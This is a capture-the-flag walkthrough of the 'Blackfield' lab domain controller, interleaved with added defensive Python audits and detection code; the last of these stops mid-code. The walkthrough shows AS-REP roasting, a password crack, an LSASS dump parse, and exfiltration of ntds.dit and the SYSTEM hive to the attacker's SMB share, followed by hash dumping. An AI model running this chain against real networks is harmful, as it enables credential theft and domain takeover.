Blackfield

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and then identify the services and versions behind those open ports.
The following nmap command scans the target machine for open ports quickly and saves the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.192 -oN allPorts
-sS: use the TCP SYN scan option. This scan is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Wed Apr 5 09:35:24 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.099s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman
49676/tcp open unknown
# Nmap done at Wed Apr 5 09:36:17 2023 -- 1 IP address (1 host up) scanned in 53.23 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:
nmap -sC -sV -p53,88,135,139,389,445,593,3268,5985,49676 10.10.10.192 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Wed Apr 5 09:36:40 2023 as: nmap -sCV -p53,88,135,139,389,445,593,3268,5985,49676 -Pn -n -oN targeted 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.067s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-05 15:36:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp filtered netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49676/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-04-05T15:36:56
|_ start_date: N/A
|_clock-skew: 8h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 5 09:37:32 2023 -- 1 IP address (1 host up) scanned in 51.93 seconds
Port 53 is open, so we can enumerate all the possible subdomains of the blackfield.local domain name with dig.
dig any blackfield.local @10.10.10.192
; <<>> DiG 9.18.11-2-Debian <<>> any blackfield.local @10.10.10.192
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53091
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;blackfield.local. IN ANY
;; ANSWER SECTION:
blackfield.local. 600 IN A 10.10.10.192
blackfield.local. 3600 IN NS dc01.blackfield.local.
blackfield.local. 3600 IN SOA dc01.blackfield.local. hostmaster.blackfield.local. 165 900 600 86400 3600
blackfield.local. 600 IN AAAA dead:beef::59ff:6dfe:cd4c:21f9
;; ADDITIONAL SECTION:
dc01.blackfield.local. 3600 IN A 10.10.10.192
dc01.blackfield.local. 3600 IN AAAA dead:beef::59ff:6dfe:cd4c:21f9
;; Query time: 36 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (TCP)
;; WHEN: Wed Apr 05 11:36:42 CEST 2023
;; MSG SIZE rcvd: 199
Let's add all these subdomain names to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.192 blackfield.local dc01.blackfield.local hostmaster.blackfield.local
Let's keep enumerating the domain controller. We can check whether the SMB server hosts any interesting shares.
smbmap -H 10.10.10.192 -u 'guest'
[+] IP: 10.10.10.192:445 Name: blackfield.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
If we check the profiles$ share, we'll see a bunch of directories whose names look like usernames.
smbmap -H 10.10.10.192 -u 'guest' -r profiles$
[+] IP: 10.10.10.192:445 Name: blackfield.local
Disk Permissions Comment
---- ----------- -------
profiles$ READ ONLY
.\profiles$\*
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 .
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ..
dr--r--r-- 0 Wed Jun 3 18:47:11 2020 AAlleni
dr--r--r-- 0 Wed Jun 3 18:47:11 2020 ABarteski
dr--r--r-- 0 Wed Jun 3 18:47:11 2020 ABekesz
...
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZScozzari
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZTimofeeff
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZWausik
Exploitation
Let's put those usernames in the users file.
smbmap -H 10.10.10.192 -u 'guest' -r profiles$ | grep "dr--r--r--" | awk '{print $8}' > users
As the domain controller exposes the Kerberos service, we can verify whether any of these usernames is valid using kerbrute.
kerbrute_linux_amd64 userenum --dc 10.10.10.192 -d blackfield.local users
Version: v1.0.3 (9dad6e1) - 04/05/23 - Ronnie Flathers @ropnop
2023/04/05 12:38:10 > Using KDC(s):
2023/04/05 12:38:10 > 10.10.10.192:88
2023/04/05 12:38:31 > [+] VALID USERNAME: audit2020@blackfield.local
2023/04/05 12:40:23 > [+] VALID USERNAME: support@blackfield.local
2023/04/05 12:40:28 > [+] VALID USERNAME: svc_backup@blackfield.local
2023/04/05 12:40:53 > Done! Tested 314 usernames (3 valid) in 162.879 seconds
Now that we have a list of valid users, let's put them into the valid_users file and try an ASREPRoast attack.
impacket-GetNPUsers blackfield.local/ -no-pass -usersfile valid_users
-no-pass: don't ask for a password.
-usersfile: file containing one user per line.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User audit2020@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL:ebd84a2b32ac125aa65fb405985c0a48$4861262f396e28b5d77218ffc4ae62e5e89315cbb26ea97fa75cab030ab186c5e0a1b3e6d9ee0526f3e46dbddd79dd252d77ef77daee5072b5d7bc8beaf5e709f710baae3d0a80fb9f17043f2b0f5b9134bcd27c6b379070ce9d8c7e59b7ac1e21837d2f58ecbb991ee6317ecaac8504b5cfd3ad8e43c6c158f44d855e00bafb2293b147cec5c1528ee3449ee8a4bf9bd7dcfc89e3b5871485cd9d1849a05fbf035c85e89a9921a0892f6d1f75c6c4a3e941ec7c6c792ec67cab1a4bae065e6ae17c7aa53320d66f718c8c0713c15a59710266e7b7b159d7919ebecdf54352f368e22c2e87caa611c929348a1518748cb9b323a3
[-] User svc_backup@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set
We get a hash for the support user. Let's try to crack it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL)
1g 0:00:00:10 DONE (2023-04-05 12:42) 0.09132g/s 1309Kp/s 1309Kc/s 1309KC/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
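The AS-REP roast above works because the support account has Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH) and the KDC still hands out an RC4 (etype 23) encrypted part that john can attack offline. The following Python is an added example, not part of the writeup or of Impacket: it decodes userAccountControl values to list enabled accounts that are exposed in this way, and parses the header of a $krb5asrep$ line to report which etype was used. The account records are constructed; in a real audit they would come from an LDAP query on the domain.

```python
# Added example (not from the writeup): find accounts exposed to AS-REP roasting
# from their userAccountControl value, and classify the etype of a $krb5asrep$
# line such as the one GetNPUsers printed above.
import re

# userAccountControl bit flags (ADS_USER_FLAG_ENUM)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample: sAMAccountName -> userAccountControl (decimal, as LDAP returns it)
SAMPLE_ACCOUNTS = {
    "audit2020": 66048,      # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    "support": 4260352,      # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQUIRE_PREAUTH
    "svc_backup": 66048,
    "old_vendor": 4260354,   # same flags as support, but the account is disabled
}


def decode_uac(uac):
    """Return the names of the flags set in a userAccountControl value."""
    names = {
        UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
        UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
        UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
        UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
    }
    return [name for bit, name in names.items() if uac & bit]


def preauth_exposed(accounts):
    """Enabled accounts with UF_DONT_REQUIRE_PREAUTH set: these can be AS-REP roasted."""
    return sorted(
        name for name, uac in accounts.items()
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE
    )


# Header of the line GetNPUsers printed above; the ciphertext is shortened here.
SAMPLE_ASREP_LINE = (
    "$krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL:"
    "ebd84a2b32ac125aa65fb405985c0a48$4861262f396e28b5"
)

ASREP_RE = re.compile(r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<principal>[^:]+):")
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}


def classify_asrep_line(line):
    """Parse a $krb5asrep$ header; etype 23 means the KDC used the legacy RC4 key."""
    m = ASREP_RE.match(line)
    if not m:
        return None
    etype = int(m.group("etype"))
    return {
        "user": m.group("principal").split("@")[0],
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "legacy_rc4": etype == 23,
    }


if __name__ == "__main__":
    for name, uac in SAMPLE_ACCOUNTS.items():
        print(f"{name:12} {uac:>8} {decode_uac(uac)}")
    print("AS-REP roastable:", preauth_exposed(SAMPLE_ACCOUNTS))
    print(classify_asrep_line(SAMPLE_ASREP_LINE))
```

Only support comes back as exposed: old_vendor has the same flag but is disabled, so the KDC will not answer for it. The etype 23 in the hash header is what makes the offline attack cheap; with RC4 disabled for the account the KDC would answer with AES (etype 17/18), which john still supports but at a far lower rate.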
Let's use the credentials we have to enumerate the domain controller in more depth with bloodhound-python.
bloodhound-python -c All -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: DC01.BLACKFIELD.local
WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 10S
Now, we have to start BloodHound. First, we have to start neo4j.
neo4j console
Then browse to localhost on port 4747 and log in with the username neo4j and password neo4j. You'll have to change the password.
On a new console, run BloodHound.
bloodhound -nosandbox
Then log in with the credentials you set up earlier.

Then, click on the Upload Data button on the right section and select all the .json files generated with bloodhound-python.

Once all the .json files are uploaded, search for the user support@blackfield.local, and we'll see in the First Degree Object Control section that the support user has the privilege to change the password of the audit2020 user.

We can change the password of the audit2020 user as support using rpcclient.
rpcclient -N -U 'support%#00^BlackKnight' 10.10.10.192 -c "setuserinfo2 audit2020 23 alfa8sa123$"
Verify that the credentials are valid.
crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:alfa8sa123$
Now that we have valid credentials for the audit2020 user, let's see if we have access to any other share.
smbmap -H 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'
[+] IP: 10.10.10.192:445 Name: blackfield.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
There is one more interesting share in which we have read permissions. Let's mount the forensic share on our local system.
mount -t cifs //10.10.10.192/forensic /mnt/forensic/ -o "username=audit2020,password=alfa8sa123$,domain=BLACKFIELD.local,rw"
Inside there is a directory called memory_analysis.
ls -l /mnt/forensic/
total 0
drwxr-xr-x 2 root root 0 Feb 23 2020 commands_output
drwxr-xr-x 2 root root 0 May 28 2020 memory_analysis
drwxr-xr-x 2 root root 0 Feb 23 2020 tools
This directory has ZIP files. There is one called lsass.zip. If this file has the LSASS memory compressed in it, we could extract passwords and hashes from it.
ls -l /mnt/forensic/memory_analysis/
total 506000
-rwxr-xr-x 1 root root 37876530 May 28 2020 conhost.zip
-rwxr-xr-x 1 root root 24962333 May 28 2020 ctfmon.zip
-rwxr-xr-x 1 root root 23993305 May 28 2020 dfsrs.zip
-rwxr-xr-x 1 root root 18366396 May 28 2020 dllhost.zip
-rwxr-xr-x 1 root root 8810157 May 28 2020 ismserv.zip
-rwxr-xr-x 1 root root 41936098 May 28 2020 lsass.zip
-rwxr-xr-x 1 root root 64288607 May 28 2020 mmc.zip
-rwxr-xr-x 1 root root 13332174 May 28 2020 RuntimeBroker.zip
-rwxr-xr-x 1 root root 131983313 May 28 2020 ServerManager.zip
-rwxr-xr-x 1 root root 33141744 May 28 2020 sihost.zip
-rwxr-xr-x 1 root root 33756344 May 28 2020 smartscreen.zip
-rwxr-xr-x 1 root root 14408833 May 28 2020 svchost.zip
-rwxr-xr-x 1 root root 34631412 May 28 2020 taskhostw.zip
-rwxr-xr-x 1 root root 14255089 May 28 2020 winlogon.zip
-rwxr-xr-x 1 root root 4067425 May 28 2020 wlms.zip
-rwxr-xr-x 1 root root 18303252 May 28 2020 WmiPrvSE.zip
Transfer it to our current directory, and decompress it.
cp /mnt/forensic/memory_analysis/lsass.zip .
unzip lsass.zip
Now we have the lsass.DMP file. Usually, LSASS memory is dumped on the Windows system itself with Mimikatz, but since we only have the dump and are not on Windows, we can parse it offline with a tool called pypykatz.
pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
...
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
...
Among other secrets, we get the NTLM hash of svc_backup. That user seems to be in the Remote Management Users group, because we can get a shell via WinRM with the hash. From there we'll be able to grab the user flag.
evil-winrm -i 10.10.10.192 -u 'svc_backup' -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type \users\svc_backup\desktop\user.txt
3920bb317a0bef51027e2852be64b543
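The real finding in this section is not the tool but the artifact: a zipped LSASS minidump left on a readable file share. From a defender's side the check is to sweep shares for such dumps by content rather than by name, since the file here was inside lsass.zip. The following Python is an added example, not from the writeup or from pypykatz: it walks a directory, identifies Windows minidumps by their MDMP signature, and also looks inside ZIP archives. The sample tree it scans is constructed in a temporary directory with a fake 'MDMP' header; no real process memory is involved.

```python
# Added example (not from the writeup): find minidump files on a directory tree
# (e.g. a mounted share) by their MDMP magic, including members of ZIP archives.
import os
import struct
import tempfile
import zipfile

MDMP_MAGIC = b"MDMP"  # MINIDUMP_HEADER.Signature


def minidump_info(data):
    """Return (version, stream_count) if data starts with a minidump header, else None."""
    if len(data) < 12 or data[:4] != MDMP_MAGIC:
        return None
    version, streams = struct.unpack_from("<II", data, 4)
    return version & 0xFFFF, streams  # low 16 bits of Version hold MINIDUMP_VERSION


def find_minidumps(root):
    """Return (path, zip_member_or_None, version, streams) for every minidump under root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                info = minidump_info(f.read(12))
            if info:
                hits.append((path, None, *info))
                continue
            if zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    for member in zf.namelist():
                        with zf.open(member) as m:
                            info = minidump_info(m.read(12))
                        if info:
                            hits.append((path, member, *info))
    return sorted(hits, key=lambda h: (h[0], h[1] or ""))


def build_sample_tree():
    """Constructed sample: a zipped fake dump, a plain fake dump, and a decoy named .dmp."""
    root = tempfile.mkdtemp(prefix="share_")
    # Signature + Version + NumberOfStreams + StreamDirectoryRva + CheckSum + TimeDateStamp + Flags
    fake_dump = MDMP_MAGIC + struct.pack("<IIIIIQ", 0xA793, 13, 32, 0, 0, 0) + b"\0" * 64
    with zipfile.ZipFile(os.path.join(root, "lsass.zip"), "w") as zf:
        zf.writestr("lsass.DMP", fake_dump)
    with open(os.path.join(root, "notes.dmp"), "wb") as f:
        f.write(b"just text, not a dump")  # name suggests a dump, content does not
    os.makedirs(os.path.join(root, "tools"))
    with open(os.path.join(root, "tools", "x.bin"), "wb") as f:
        f.write(fake_dump)  # a dump hidden behind a harmless name
    return root


if __name__ == "__main__":
    for path, member, version, streams in find_minidumps(build_sample_tree()):
        where = f"{path}::{member}" if member else path
        print(f"minidump {where} version=0x{version:04x} streams={streams}")
```

Matching on the header rather than the file name catches both the renamed dump and the one inside the archive, and ignores the decoy; pointing it at a mounted share such as /mnt/forensic is the whole usage.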
Privilege Escalation
Indeed, the svc_backup user is a member of the Remote Management Users group, but it is also a member of the Backup Operators group.
net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/5/2023 9:00:19 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
The idea is to copy the ntds.dit file to our system, so we can extract the NTLM hashes of all the domain users. We can follow the article Dumping Domain Password Hashes. First, set up a simple SMB server in the current directory.
impacket-smbserver smbFolder $(pwd) -smb2support
Now, go to \windows\temp, create the directory privEsc, and get in there.
cd \windows\temp
mkdir privEsc
cd privEsc
Then, create a new file called diskshadow.txt and upload it to the victim machine. Make sure to add a blank space at the end of each line.
nano diskshadow.txt
upload /home/alfa8sa/HTB/machines/blackfield/diskshadow.txt
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
Run diskshadow with the diskshadow.txt script to create a shadow copy of C:\ and expose it as a new logical disk.
diskshadow.exe /s diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 4/5/2023 12:35:51 PM
-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {3abd85c1-910d-4b72-86cc-871254097018} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} set as environment variable.
Querying all shadow copies with the shadow copy set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7}
* Shadow copy ID = {3abd85c1-910d-4b72-86cc-871254097018} %someAlias%
- Shadow copy set: {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 4/5/2023 12:35:52 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %someAlias% z:
-> %someAlias% = {3abd85c1-910d-4b72-86cc-871254097018}
The shadow copy was successfully exposed as z:\.
->
Now we should see ntds.dit in the z: disk.
dir z:\windows\ntds
Directory: z:\windows\ntds
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2023 2:34 PM 8192 edb.chk
-a---- 4/5/2023 12:35 PM 10485760 edb.log
-a---- 2/23/2020 9:41 AM 10485760 edb00004.log
-a---- 2/23/2020 9:41 AM 10485760 edb00005.log
-a---- 2/23/2020 3:13 AM 10485760 edbres00001.jrs
-a---- 2/23/2020 3:13 AM 10485760 edbres00002.jrs
-a---- 2/23/2020 9:41 AM 10485760 edbtmp.log
-a---- 4/5/2023 12:30 PM 18874368 ntds.dit
-a---- 4/5/2023 12:30 PM 16384 ntds.jfm
-a---- 4/5/2023 12:30 PM 434176 temp.edb
Let's copy it to our local SMB server with robocopy.
robocopy /b z:\windows\ntds \\10.10.14.5\smbFolder\ ntds.dit
We will also need a copy of the HKLM\system hive.
reg save HKLM\system \\10.10.14.5\smbFolder\system
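Everything that happens on the domain controller in this chain runs as a Backup Operators member and leaves process-creation events behind: diskshadow driven by a script file, robocopy in backup mode (/b) reading the exposed shadow copy, and reg.exe saving HKLM\SYSTEM to a UNC path. The following Python is an added example, not from the writeup: a small detection that runs these patterns over constructed process-creation records shaped like the fields of Windows Security event 4688 (user, image, command line) and reports the users that trip more than one rule, i.e. the chain rather than a single stray backup command. The event records and the rule names are my own.

```python
# Added example (not from the writeup): detect the Backup Operators chain used above
# (scripted diskshadow, robocopy /b of the NTDS folder, reg save of HKLM\SYSTEM)
# from process-creation records. Sample events are constructed.
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    {"user": "BLACKFIELD\\svc_backup", "image": "C:\\Windows\\System32\\diskshadow.exe",
     "cmdline": "diskshadow.exe /s diskshadow.txt"},
    {"user": "BLACKFIELD\\svc_backup", "image": "C:\\Windows\\System32\\Robocopy.exe",
     "cmdline": "robocopy /b z:\\windows\\ntds \\\\10.10.14.5\\smbFolder\\ ntds.dit"},
    {"user": "BLACKFIELD\\svc_backup", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg save HKLM\\system \\\\10.10.14.5\\smbFolder\\system"},
    # A legitimate backup job by another operator: should not be flagged
    {"user": "BLACKFIELD\\backupadmin", "image": "C:\\Windows\\System32\\Robocopy.exe",
     "cmdline": "robocopy D:\\Data \\\\fileserver\\backups\\Data /MIR"},
]

RULES = [
    # diskshadow reading its commands from a file (non-interactive shadow copy creation)
    ("diskshadow_scripted", re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I)),
    # robocopy with backup semantics touching an ntds directory
    ("robocopy_backup_mode_ntds", re.compile(r"\brobocopy\b.*\s/b\b.*\\ntds\b", re.I)),
    # SYSTEM hive export (holds the boot key that decrypts ntds.dit secrets)
    ("reg_save_system_hive", re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\system\b", re.I)),
    # destination is a UNC path to a bare IP address rather than a named server
    ("unc_to_bare_ip", re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\")),
]


def detect(events):
    """Return (user, rule_name) for every rule that matches an event's command line."""
    alerts = []
    for ev in events:
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                alerts.append((ev["user"], name))
    return alerts


def suspicious_users(events, threshold=2):
    """Users that trip at least `threshold` distinct rules: the chain, not one stray command."""
    hits = defaultdict(set)
    for user, name in detect(events):
        hits[user].add(name)
    return sorted(u for u, names in hits.items() if len(names) >= threshold)


if __name__ == "__main__":
    for user, rule in detect(SAMPLE_EVENTS):
        print(f"{user:24} {rule}")
    print("escalate:", suspicious_users(SAMPLE_EVENTS))
```

The threshold is the point of the design: backup software legitimately creates shadow copies and copies files, so any one rule alone is noisy, while a single account doing all three within a short window on a domain controller is the pattern worth paging on. Membership changes to Backup Operators on a DC are the complementary, lower-volume signal.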
Finally, we can extract the NTLM hashes with secretsdump.
impacket-secretsdump -system system -ntds ntds.dit LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2a2f8ac26db968c93a17fefdb36c38ee:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...
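The secretsdump output above is the same data an administrator gets from an authorized NTDS audit, and the first two things to check in it are blank passwords and password reuse across accounts. The following Python is an added example, not from the writeup or from Impacket: it parses the domain\uid:rid:lmhash:nthash::: lines, skipping the status lines, and reports accounts whose NT hash is the empty-password hash, accounts that still store an LM hash, and groups of accounts sharing an NT hash. The sample reuses the lines shown above plus one constructed svc_test line that shares Administrator's hash to illustrate reuse.

```python
# Added example (not from the writeup): audit secretsdump NTDS output for blank
# passwords, stored LM hashes and NT-hash reuse. Sample input partly constructed.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2a2f8ac26db968c93a17fefdb36c38ee:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
svc_test:1105:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
"""
# The svc_test line is constructed for this example; the others are from the dump above.


def parse_dump(text):
    """Return one record per hash line; banner and status lines are ignored."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append({
            "user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].lower(), "nt": parts[3].lower(),
        })
    return records


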